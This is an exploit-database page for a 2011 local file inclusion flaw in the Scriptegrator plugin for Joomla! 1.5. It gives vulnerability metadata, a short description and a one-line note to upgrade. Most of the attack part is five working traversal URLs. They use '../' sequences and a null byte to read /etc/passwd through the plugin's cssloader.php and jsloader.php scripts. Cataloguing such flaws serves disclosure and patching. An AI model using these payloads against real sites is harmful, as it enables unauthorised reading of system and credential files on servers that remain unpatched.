header-logo
Suggest Exploit
vendor:
Scriptegrator Plugin for Joomla! 1.5
by:
jdc
9.3
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Scriptegrator Plugin for Joomla! 1.5
Affected Version From: 1.5.2005
Affected Version To: 1.5.2005
Patch Exists: YES
Related CWE: N/A
CPE: a:greatjoomla:scriptegrator_plugin_for_joomla_1.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2011

Scriptegrator plugin for Joomla! 1.5 0day File Inclusion

A vulnerability in the Scriptegrator plugin for Joomla! 1.5 allows attackers to include arbitrary files from the local system. This is done by sending a specially crafted HTTP request to the vulnerable server, which contains the file path in the request. The vulnerable code is located in the libraries/highslide/css/cssloader.php, libraries/highslide/js/jsloader.php, libraries/jquery/theme/cssloader.php, libraries/jquery/js/jsloader.php, and libraries/jquery/js/ui/jsloader.php files.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of the Scriptegrator plugin for Joomla! 1.5.
Source

Exploit-DB raw data:

# Exploit Title: Scriptegrator plugin for Joomla! 1.5 0day File Inclusion
# Originally Reported: Early 2011
# Independently Discovered: 20 April 2011
# Released: 13 June 2011
# Author: jdc
# Software Link: http://www.greatjoomla.com/extensions/plugins/core-design-scriptegrator-plugin.html
# Version: 1.5.5


``````````````````````````````````````````````````````````````````````````
It looks like this one was reported as in-use by someone else sometime around February (?) 2011:
*	http://www.greatjoomla.com/index.php?option=com_kunena&Itemid=171&func=view&catid=32&id=6310

Local File Inclusion
====================

http://[target]/plugins/system/cdscriptegrator/libraries/highslide/css/cssloader.php?files[]=../../../../../../../../../../../../etc/passwd%00.css

http://[target]/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../etc/passwd%00.js

http://[target]/plugins/system/cdscriptegrator/libraries/jquery/theme/cssloader.php?file=../../../../../../../../../../../../etc/passwd%00.css

http://[target]/plugins/system/cdscriptegrator/libraries/jquery/js/jsloader.php?files[]=../../../../../../../../../../../../etc/passwd%00.js

http://[target]/plugins/system/cdscriptegrator/libraries/jquery/js/ui/jsloader.php?file=../../../../../../../../../../../../etc/passwd%00.js

Navigation

Suggest Exploit

Services By CQR